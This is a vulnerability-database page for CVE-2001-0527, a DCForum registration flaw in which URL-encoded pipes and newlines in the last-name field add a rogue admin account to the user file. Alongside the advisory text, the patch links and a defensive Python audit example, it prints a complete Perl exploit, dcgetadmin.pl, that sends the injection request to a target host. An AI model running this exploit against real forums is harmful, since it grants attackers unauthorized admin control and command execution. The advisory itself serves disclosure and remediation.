CVE-2001-0527
CVSS 10.0
Published: 2001-08-14 00:00:00
Revised: 2008-09-05 16:24:19

[Original] DCScripts DCForum versions 2000 and earlier allow a remote attacker to gain additional privileges by inserting pipe symbols (|) and newlines into the last name in the registration form, which will create an extra entry in the registration database.


[CNNVD] DCForum Remote Administrative Privilege Acquisition Vulnerability (CNNVD-200108-061)

        DCForum is a web-based conferencing system designed for online discussion. It is implemented in Perl, has almost no system dependencies, and runs on Linux, Windows, and most Unix variants.
        Some versions of DCForum contain a vulnerability that a remote attacker can exploit to gain DCForum administrative privileges and even execute arbitrary commands.
        DCForum maintains a file of user account information, including hashes of user passwords and other sensitive data. When a new account is created, the user's information is written to this file, one user per line, with the fields of each record separated by the pipe character ('|'). DCForum does not validate user-supplied input strictly: by placing a URL-encoded pipe and newline at the end of the last field of the registration data, an attacker can append arbitrary additional users to the user information file, including users with administrative privileges.
        An account with DCForum administrative privileges may be able to execute arbitrary commands with the privileges of the web server.


- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:dcscripts:dcforum_2000:1.0
cpe:/a:dcscripts:dcforum:6.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0527
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0527
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-061
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/6538.php
(VENDOR_ADVISORY)  XF  dcforum-cgi-admin-access(6538)
http://www.dcscripts.com/dcforum/dcfNews/167.html
(PATCH)  CONFIRM  http://www.dcscripts.com/dcforum/dcfNews/167.html
http://archives.neohapsis.com/archives/bugtraq/2001-05/0122.html
(VENDOR_ADVISORY)  BUGTRAQ  20010515 DCForum Password File Manipukation Vulnerability (qDefense Advisory Number QDAV-5-2000-2)
http://www.securityfocus.com/bid/2728
(UNKNOWN)  BID  2728
http://www.osvdb.org/480
(UNKNOWN)  OSVDB  480

- Vulnerability information

DCForum Remote Administrative Privilege Acquisition Vulnerability
Critical  Input validation
2001-08-14 00:00:00 2005-05-02 00:00:00
Remote

- Advisory and patches

        Vendor patch:
        DC Scripts
        ----------
        The vendor has released an upgrade patch to fix this security issue; download it from the vendor's homepage:
        DC Scripts DCForum 2000 1.0:
        DC Scripts Patch 2000 auth_lib_2_dcf2000.zip
        
        http://www.dcscripts.com/FAQ/auth_lib_2_dcf2000.zip

        DC Scripts DCForum 6.0:
        DC Scripts Patch 6.0 auth_lib_2_dcf6.zip
        
        http://www.dcscripts.com/FAQ/auth_lib_2_dcf6.zip

- Vulnerability information (20849)

DCForum 6.0 Remote Admin Privilege Compromise Vulnerability (EDBID:20849)
cgi remote
2001-05-08 Verified
0 Franklin DeMatto
N/A
source: http://www.securityfocus.com/bid/2728/info

DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.

Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands.

DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.

When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.

DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges.

This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. 
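The delimiter-injection flaw described above, as an added example that is not part of the original advisory or of DCForum's own code: the flawed pipe-delimited record writer beside a hardened one that rejects delimiter characters, a parser that reads the file back the way the forum would, and an audit that flags admin records the operator never created. The field order, the hash values and the usernames are assumed for illustration.

```python
from urllib.parse import unquote

# Assumed field layout of one line in the DCForum user file; the real order is
# not stated on this page. Fields are separated by '|', records by newline.
FIELDS = ("hash", "username", "privilege", "firstname", "lastname")
DELIMITERS = ("|", "\n", "\r")


def format_record_unchecked(*values):
    """The flawed pattern: join the fields without checking for delimiters."""
    return "|".join(values) + "\n"


def format_record_checked(*values):
    """Hardened writer: refuse any field carrying a field or record delimiter."""
    for name, value in zip(FIELDS, values):
        if any(d in value for d in DELIMITERS):
            raise ValueError(f"field {name!r} contains a delimiter")
    return format_record_unchecked(*values)


def parse_user_file(text):
    """Read the file back as the forum would: one dict per non-empty line."""
    return [dict(zip(FIELDS, line.split("|")))
            for line in text.splitlines() if line.strip()]


def unexpected_admins(text, known_admins):
    """Audit helper: usernames with admin privilege that the operator never created."""
    return [r["username"] for r in parse_user_file(text)
            if r.get("privilege") == "admin" and r["username"] not in known_admins]


# Constructed sample: the decoded form of the last-name value from the advisory,
# with a placeholder hash and username.
INJECTED_LASTNAME = unquote("Concept%0aFAKEHASH%7cevilhacker123%7cadmin%7cProof%7cConcept")


def demo():
    """Write the same registration through both writers; return what each did."""
    args = ("DUMMYHASH", "not123", "user", "Proof", INJECTED_LASTNAME)
    unchecked = format_record_unchecked(*args)
    try:
        format_record_checked(*args)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "records_written_unchecked": len(parse_user_file(unchecked)),
        "rejected_by_checked_writer": rejected,
        "rogue_admins": unexpected_admins(unchecked, known_admins={"forumadmin"}),
    }
```

Run `demo()` to see one registration turn into two records under the unchecked writer; the audit function can be pointed at a real user file to look for the same symptom.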

#!/usr/bin/perl

# dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin@qDefense.com


use Getopt::Std;
use IO::Socket;

getopts ('ap');

usage () unless ($#ARGV == 0 || $#ARGV == 1);
if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; }

$host = $ARGV[0];
$uri =  $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi';

# Random credentials for the injected record and for the dummy account whose
# last-name field carries the injection.
$username = 'evilhacker' .  ( int rand(9899) + 100);
$password = int rand  (9899) + 100;
$hash = $opt_p ? $password : crypt ($password, substr ($password, 0, 2));
$dummyuser = 'not' . ( int rand(9899) + 100) ;
$dummypass = int rand (9899) + 100;

print "\n(Debugging info: Hash = $hash    Dummyuser = $dummyuser    Dummypass = $dummypass)\n";
print "Attempting to register username $username with password $password as admin . . .\n";

$sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n";
# The whole request is a single GET request line followed by a Host header.
$req = "GET $uri?command=register&az=user_register&Username=$dummyuser&Password=$dummypass&dup_Password=$dummypass";
$req .= "&Firstname=Proof&Lastname=Concept%0a$hash%7c$username%7cadmin%7cProof%7cConcept&EMail=nothere%40nomail.com";
$req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012";
$req .= "Host: $host\015\012\015\012";

print $sock $req;

print "The server replied:\n\n";

# Print the text of the response body with tags stripped, stopping at the
# next form or at </BODY>.
while (<$sock>)
{
  if (/BODY/) { $in_body = 1; }
  next unless $in_body;
  if (/form|<\/BODY>/) { last; }
  s/<.+?>//g;
  print $_ unless (/^\s*$/);
}
print "\nNote: Even if your password is supposed to be e-mailed to you, it should work right away.\n";


sub usage
{
  print <<EOF;
dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin\@qDefense.com

Usage: $0 [options] host [path to dcboard.cgi]

Options:
   -a to activate the account (for sites that do not activate automatically)
  NOTE: This option is not yet supported, but should be quite easy to add if you need it
  
  -p to leave the password in plaintext (necessary when the target is NT)

The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcboard.cgi

EOF
  exit 1;
}



- Vulnerability information

480
DCForum dcboard.cgi Arbitrary Admin Account Creation
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

DCForum contains a flaw that allows a remote attacker to create an arbitrary administrative account. Due to a flaw in the process of creating a new user, proper sanitization is not applied to input. This allows an attacker to supply a pipe (|) and arbitrary text in the form of an additional user account, which will be added to the password file.

- Timeline

2001-05-15 Unknown
2001-05-15 Unknown

- Solution

Upgrade to version 6.25 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete